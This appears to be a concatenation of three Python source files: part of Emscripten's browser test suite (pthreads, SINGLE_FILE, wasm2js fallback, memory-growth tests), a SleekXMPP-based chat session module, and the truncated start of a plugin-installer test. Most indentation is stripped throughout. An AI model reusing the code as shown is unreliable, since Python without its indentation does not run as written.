['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG=1', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '-s', 'MINIMAL_RUNTIME=1']]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = 'src.c'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
self.compile_btest(['src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE=1'])
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE=1'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME=1', '-s', 'SINGLE_FILE=1', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE=1', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = ['src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
  # Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
  # program can run either on the main thread (normal tests) or, as in this test, be started
  # inside a Worker (in that case, the main application thread and the worker threads are
  # all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
create_test_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
create_test_file('page.c', self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
self.compile_btest(['page.c', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([PYTHON, FILE_PACKAGER, 'data.js', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest(['page.c', '-s', 'ALLOW_MEMORY_GROWTH=1', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
  # Tests that Emscripten-compiled applications can be run from a relative path in the browser that is different from the address of the current page
def test_browser_run_from_different_directory(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
self.compile_btest(['test.c', '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
  # Similar to `test_browser_run_from_different_directory`, but here we also eval the initial
  # code, so currentScript is not present. That prevents us from finding the file in a subdir,
  # but here we at least check we do not regress compared to the normal case of finding it in
  # the current dir.
def test_browser_modularize_no_current_script(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE=1'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE=1'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind'] + self.get_async_args())
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME=1'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE=1'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE=1']]:
for modularize in [[], ['-s', 'MODULARIZE=1']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION=1', '--closure', '1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION=1', '--closure', '1']]:
self.btest(path_from_root('tests', 'small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME=1'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME=1'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'small_hello_world.c')).read()))
self.compile_btest([src, '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
      # Then disable WebAssembly support in the VM and try again. The page should still work with the Wasm2JS fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'small_hello_world.c')).read()))
self.compile_btest([src, '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
      # Restore the .wasm.js file, then corrupt the .wasm file; that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(path_from_root('tests', 'system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB.cpp', js_engines=[V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2GB_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_2GB_fail.cpp', js_engines=[V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB_fail.cpp', js_engines=[V8_ENGINE])
@unittest.skip("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
    # The specific symptom of the hang that was fixed is that the test hangs
    # at some point, using 0% CPU. Often that occurred in 0-200 iterations, but
    # you may want to adjust "ITERATIONS".
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS=1', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
|
xmpp.py
|
import datetime
import logging
import threading
import tzlocal
# See:
# * http://sleekxmpp.com/getting_started/muc.html
# * http://sleekxmpp.com/getting_started/echobot.html
# * https://github.com/fritzy/SleekXMPP/wiki/Stanzas:-Message
from sleekxmpp import ClientXMPP
from chatty.exceptions import OperationNotSupported
from chatty.sessions.interface import Session
from chatty.signals.interface import Signal
from chatty.signals.message import Message
from chatty.signals.metadata import SignalMetaData
from chatty.signals.status_change import StatusChange
from chatty.types import LoginConfig, Handle, SignalID, StatusTypes, PresenceStatusValues, TypingStatusValues
LOGGER = logging.getLogger(__name__)
class XMPPSession(Session):
"""
An XMPP chat session interface.
"""
def __init__(self, connection_info: LoginConfig, xmpp_client: ClientXMPP = None,
starting: datetime.datetime = None):
super().__init__()
if xmpp_client is None:
xmpp_client = make_xmpp_client(connection_info)
self._xmpp_client = xmpp_client
self._xmpp_connection_info = connection_info
self._starting = datetime.datetime.now(tzlocal.get_localzone()) if starting is None else starting
# Register callbacks for incoming messages
self._xmpp_client.add_event_handler("session_start", self.on_session_started)
self._xmpp_client.add_event_handler("message", self.on_message)
self._xmpp_client.add_event_handler("groupchat_message", self.on_group_chat_message)
self._xmpp_client.add_event_handler("failed_auth", self.on_failed_authentication)
self._xmpp_client.add_event_handler("error", self.on_error)
# See https://xmpp.org/extensions/xep-0085.html#definitions
self._xmpp_client.add_event_handler("chatstate_active", self.on_chatstate_active)
self._xmpp_client.add_event_handler("chatstate_composing", self.on_chatstate_composing)
self._xmpp_client.add_event_handler("chatstate_gone", self.on_chatstate_gone)
self._xmpp_client.add_event_handler("chatstate_inactive", self.on_chatstate_inactive)
self._xmpp_client.add_event_handler("chatstate_paused", self.on_chatstate_paused)
self._main_thread = threading.current_thread()
self._thread_error = None
self._alive = True
self._process_thread = threading.Thread(target=self._process_main, daemon=True)
self._process_thread.start()
self._check_for_thread_errors()
def _check_for_thread_errors(self):
if self._thread_error and threading.current_thread() == self._main_thread:
thread_error, self._thread_error = self._thread_error, None
raise thread_error
def _notify_thread_error(self, exc: Exception):
LOGGER.exception("Error in thread: %s" % exc)
self._thread_error = exc
def close(self):
if hasattr(self, '_xmpp_client'):
self._xmpp_client.disconnect()
self._alive = False
self._process_thread.join()
self._check_for_thread_errors()
def join(self, timeout=None):
self._process_thread.join(timeout)
def send(self, signal: Signal) -> None:
# TODO: Handle outbound presence & typing status changes.
if not isinstance(signal, Message):
raise TypeError(signal)
assert isinstance(signal, Message)
origin = signal.meta_data.origin
if signal.meta_data.visible_to:
raise OperationNotSupported("XMPP protocol does not support carbon-copying.")
if signal.meta_data.room:
self._xmpp_client.send_message(
mfrom=origin,
mto=signal.meta_data.room,
mbody=str(signal.content),
mtype='groupchat'
)
for recipient in signal.meta_data.addressees:
self._xmpp_client.send_message(
mfrom=origin,
mto=recipient,
mbody=str(signal.content),
mtype='chat'
)
self._check_for_thread_errors()
# noinspection PyUnusedLocal
def on_session_started(self, event):
try:
LOGGER.info("Successfully connected and authenticated.")
self._xmpp_client.get_roster()
self._xmpp_client.send_presence()
except Exception as exc:
LOGGER.exception("Error in on_session_started()")
self._notify_thread_error(exc)
@staticmethod
def _get_meta_data(event):
origin = Handle(event['from'].bare)
visible_to = [origin]
if event.get('to', None):
addressees = [Handle(event['to'].bare)]
visible_to.extend(addressees)
else:
addressees = None
if event.get('room', None):
room = Handle(event['room'].bare)
# TODO: Add everyone in the room to visible_to
else:
room = None
return SignalMetaData(
identifier=SignalID(event['id']),
origin=origin,
addressees=addressees,
visible_to=visible_to,
response_to=None,
sent_at=None,
received_at=datetime.datetime.now(),
room=room
)
def on_message(self, message):
try:
LOGGER.info("Message received.")
# Only handle regular chat messages
if message['type'] not in ('chat', 'normal'):
LOGGER.debug("Ignoring non-chat message.")
return
meta_data = self._get_meta_data(message)
message = Message(meta_data, message['body'])
self.receive(message)
except Exception as exc:
LOGGER.exception("Error in on_message()")
self._notify_thread_error(exc)
def on_group_chat_message(self, message):
try:
LOGGER.info("Group-chat message received.")
# Only handle group chat messages
if message['type'] != 'groupchat':
LOGGER.debug("Ignoring non-groupchat message.")
return
meta_data = self._get_meta_data(message)
message = Message(meta_data, message['body'])
self.receive(message)
except Exception as exc:
LOGGER.exception("Error in on_group_chat_message()")
self._notify_thread_error(exc)
# noinspection PyUnusedLocal
def on_failed_authentication(self, event):
try:
LOGGER.critical("Authentication failed.")
self.close()
except Exception as exc:
LOGGER.exception("Error in on_failed_authentication()")
self._notify_thread_error(exc)
# noinspection PyMethodMayBeStatic
def on_error(self, event):
LOGGER.error("XMPP error event: %s" % event)
def on_chatstate_active(self, event):
try:
LOGGER.info("Presence=present message received.")
meta_data = self._get_meta_data(event)
signal = StatusChange(meta_data, StatusTypes.PRESENCE, PresenceStatusValues.PRESENT)
self.receive(signal)
except Exception as exc:
LOGGER.exception("Error in on_chatstate_active()")
self._notify_thread_error(exc)
def on_chatstate_inactive(self, event):
try:
LOGGER.info("Presence=inactive message received.")
meta_data = self._get_meta_data(event)
signal = StatusChange(meta_data, StatusTypes.PRESENCE, PresenceStatusValues.INACTIVE)
self.receive(signal)
except Exception as exc:
LOGGER.exception("Error in on_chatstate_inactive()")
self._notify_thread_error(exc)
def on_chatstate_gone(self, event):
try:
LOGGER.info("Presence=away message received.")
meta_data = self._get_meta_data(event)
signal = StatusChange(meta_data, StatusTypes.PRESENCE, PresenceStatusValues.AWAY)
self.receive(signal)
except Exception as exc:
LOGGER.exception("Error in on_chatstate_gone()")
self._notify_thread_error(exc)
def on_chatstate_composing(self, event):
try:
LOGGER.info("Typing=started message received.")
meta_data = self._get_meta_data(event)
signal = StatusChange(meta_data, StatusTypes.TYPING, TypingStatusValues.STARTED)
self.receive(signal)
except Exception as exc:
LOGGER.exception("Error in on_chatstate_composing()")
self._notify_thread_error(exc)
def on_chatstate_paused(self, event):
try:
LOGGER.info("Typing=stopped message received.")
meta_data = self._get_meta_data(event)
signal = StatusChange(meta_data, StatusTypes.TYPING, TypingStatusValues.STOPPED)
self.receive(signal)
except Exception as exc:
LOGGER.exception("Error in on_chatstate_paused()")
self._notify_thread_error(exc)
def _process_main(self):
while self._alive:
try:
# Connect to the XMPP server and start processing XMPP stanzas.
if self._xmpp_client.connect((self._xmpp_connection_info.host, self._xmpp_connection_info.port)):
self._xmpp_client.process(block=True)
else:
raise ConnectionError()
except Exception as exc:
LOGGER.exception("Error in xmpp client.")
self._thread_error = exc
def make_xmpp_client(connection_info: LoginConfig):
client = ClientXMPP('%s@%s' % (connection_info.user, connection_info.host), connection_info.password)
client.use_signals()
# TODO: Make sure all events are handled, and check if we should support other XEPs.
client.register_plugin('xep_0030') # Service Discovery
client.register_plugin('xep_0045') # Multi-User Chat
client.register_plugin('xep_0085') # Chat State Notifications
client.register_plugin('xep_0199') # XMPP Ping
# TODO: Use XEP 0079 to add delivery failure notifications once the sleekxmpp plugin for this XEP is released.
# client.register_plugin('xep_0079') # Advanced Message Processing
return client
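# Illustrative sketch only (not part of the module): one way the XMPPSession API above might be
# wired together. The LoginConfig constructor call below is an assumption (this module only relies
# on its host/port/user/password attributes), and the JIDs and message text are placeholders.
if __name__ == '__main__':
    config = LoginConfig(host='xmpp.example.com', port=5222, user='alice', password='secret')  # assumed signature
    session = XMPPSession(config)
    meta = SignalMetaData(
        identifier=None,
        origin=Handle('alice@xmpp.example.com'),
        addressees=[Handle('bob@xmpp.example.com')],
        visible_to=None,
        response_to=None,
        sent_at=None,
        received_at=None,
        room=None
    )
    session.send(Message(meta, 'hello from chatty'))
    session.close()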
|
test_podmodel_installer.py
|
"""test_podmodel_installer.py - tests the podmodel_installer module
Chris R. Coughlin (TRI/Austin, Inc.)
"""
__author__ = 'Chris R. Coughlin'
from controllers import pathfinder
from models.tests import test_plugin_installer
import models.podmodel_installer as podmodel_installer
import models.zipper as zipper
import cStringIO
import unittest
import os
import random
import string
import threading
class TestPODModelInstaller(test_plugin_installer.TestPluginInstaller):
"""Tests the PODModelInstaller class"""
def setUp(self):
